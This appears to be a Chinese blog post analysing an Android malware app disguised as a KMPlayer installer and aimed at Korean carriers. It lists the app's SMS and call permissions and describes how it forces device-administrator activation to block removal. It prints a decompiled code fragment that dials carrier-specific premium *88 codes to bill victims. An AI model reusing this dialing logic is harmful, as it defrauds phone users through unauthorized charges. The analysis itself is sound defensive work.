一个android病毒分析com.example.com.android.message2

        工作之余，在等项目反馈，无聊之中去分析病毒代码，今天来给大家分析一款新型的手机病毒，发现腾讯和360都没有被查杀，可见这些杀毒软件只会跟在别人屁股后面。
       这款病毒伪装为KMPlayer的安装软件，如图，下载在电脑会是

    apk包名为:com.example.com.android.message2      

    apk的权限三个比较重要的

     <uses-permission android:name="android.permission.RECEIVE_SMS" />//读取短信
     <uses-permission android:name="android.permission.READ_PHONE_STATE" />>//读取电话状态    
     <uses-permission android:name="android.permission.CALL_PHONE" /> //打电话

     apk会以短信域名的方式收到而点击下载自动安装

   点安装看下一步会发生什么情况

    安装完成会我打开发现软件直接跳进要激活设备管理器

 
 这个功能主机是把软件功能用户在软件管理变灰，不让用户删除

二秒钟后，这个病毒会打拨打电话给游戏冲值

代码如下

String str;
    if ("olleh".equals(HeartReceiver.a(this.a)))
      str = "*88" + this.b + "*";
    while (true)
    {
      Intent localIntent = new Intent("android.intent.action.CALL", Uri.fromParts("tel", str, null));
      localIntent.setFlags(268697600);
      this.c.startActivity(localIntent);
      return;
      if ("SKTelecom".equals(HeartReceiver.a(this.a)))
        str = "*88" + this.b + "*";
      else if ("LG U+".equals(HeartReceiver.a(this.a)))
        str = "*88#" + this.b;
      else
        str = "*88" + this.b + "*";

调用CALL来拔打电话，Sk，LG,OLL分别的韩国三大移动商。

同时还带有服务身指家号码群发短信。